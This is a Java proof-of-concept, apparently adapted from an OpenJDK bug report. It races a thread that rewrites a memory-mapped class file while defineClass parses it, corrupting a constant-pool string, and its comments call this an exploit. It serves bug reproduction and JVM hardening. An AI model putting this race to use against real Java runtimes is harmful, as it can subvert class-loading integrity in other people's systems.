/*

// This is a modified test from https://bugs.openjdk.org/browse/JDK-8365588
// It doesn't use java.lang.foreign.MemorySegment.
// The same exploit can be implemented using old APIs such as RandomAccessFile / FileChannel (since JDK 1.4??)

wget https://repo1.maven.org/maven2/org/ow2/asm/asm/9.8/asm-9.8.jar
mkdir -p toctou
javac -d toctou -cp asm-9.8.jar TocTouTest2.java
java  -cp toctou:asm-9.8.jar toctou.TocTouTest2

*/


package toctou;

import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.RandomAccessFile;
import java.lang.reflect.Method;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.ConcurrentLinkedDeque;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassWriter;
import static org.objectweb.asm.Opcodes.*;

public class TocTouTest2 {
    public static void main(String[] args) throws Exception {
        var cw = new ClassWriter(0);
        cw.visit(V17, ACC_PUBLIC, "toctou/Test", null, "java/lang/Object", null);
        var string = "corrupted_strin!".replace('!', 'g');
        var corruptedString = '\0' + string.substring(1);
        var mv = cw.visitMethod(ACC_PUBLIC | ACC_STATIC, string, "()Ljava/lang/String;", null, null);
        mv.visitCode();
        mv.visitLdcInsn(string);
        mv.visitInsn(ARETURN);
        mv.visitMaxs(1, 0);
        mv.visitEnd();
        cw.visitEnd();
        byte[] bytes = cw.toByteArray();
        var cr = new ClassReader(bytes);
        int byteOffset;


        lookup:
        {
            for (int i = 1; i < cr.getItemCount(); i++) {
                int offset = cr.getItem(i);
                int tag = bytes[offset - 1] & 0xFF;
                if (tag != 1) {
                    continue;
                }
                if (new DataInputStream(new ByteArrayInputStream(bytes, offset, bytes.length - offset)).readUTF().equals(string)) {
                    byteOffset = offset + 2;
                    break lookup;
                }
            }
            throw new IllegalStateException();
        }

        record Entry(ByteBuffer bb, AtomicInteger uses) {}
        var queue = new ConcurrentLinkedDeque<Entry>();
        var thread = Thread.ofPlatform().daemon().start(() -> {
            do {
                Entry entry;
                if ((entry = queue.poll()) != null) {
                    try {
                        ByteBuffer slice = entry.bb.slice();
                        slice.put(byteOffset, (byte) 0);
                    } finally {

                    }
                }
            } while (!Thread.interrupted());
        });

        System.out.println("Size = " + bytes.length);
        FileOutputStream faos = new FileOutputStream("TocTou.class");
        faos.write(bytes);
        faos.close();

        class Loader extends ClassLoader {
            Class<?> define() {
                var counter = new AtomicInteger(2);
                ByteBuffer bb = null;

                if (false) {
                    byte[] newarray = new byte[bytes.length];
                    System.arraycopy(bytes, 0, newarray, 0, bytes.length);
                    bb = ByteBuffer.wrap(newarray);
                } else {
                    try {
                        File f = new File("TocTou_tmp.class");
                        FileOutputStream faos = new FileOutputStream(f);
                        faos.write(bytes);
                        faos.close();

                        try (RandomAccessFile raf = new RandomAccessFile(f, "rw")) {
                            try (FileChannel fileChannel = raf.getChannel()) {
                                bb = fileChannel.map(FileChannel.MapMode.READ_WRITE, 0, fileChannel.size());
                            }
                        }
                    } catch (Throwable t) {
                        t.printStackTrace();
                        System.exit(0);
                    }
                }

                System.out.println("Offered");
                queue.offer(new Entry(bb, counter));
                try {
                    System.out.println("defineClass()");
                    Class<?> c = defineClass(null, bb, null);
                    System.out.println("Good");
                    return c;
                } finally {
                    if (counter.decrementAndGet() == 0) {
                        
                    }
                }
            }
        }

        var loader = new Loader();

        int n = 0;
        try {
            for (; ; n++) {
                Class<?> c;
                try {
                    c = loader.define();
                    loader = new Loader();
                } catch (ClassFormatError ignored) {
                    System.out.println(ignored + "=======");
                    continue;
                }
                Method method;
                try {
                    method = c.getDeclaredMethod(string);
                } catch (NoSuchMethodException ignored) {
                    System.out.println(ignored);
                    method = c.getDeclaredMethod(corruptedString);
                }
                System.out.println(method);
                String myString;
                myString = (String) method.invoke(null);
                if (!string.equals(myString)) {
                    System.out.println(myString);
                }
            }
        } finally {
            System.out.println("Failed after " + n + " times");
        }
    }
}
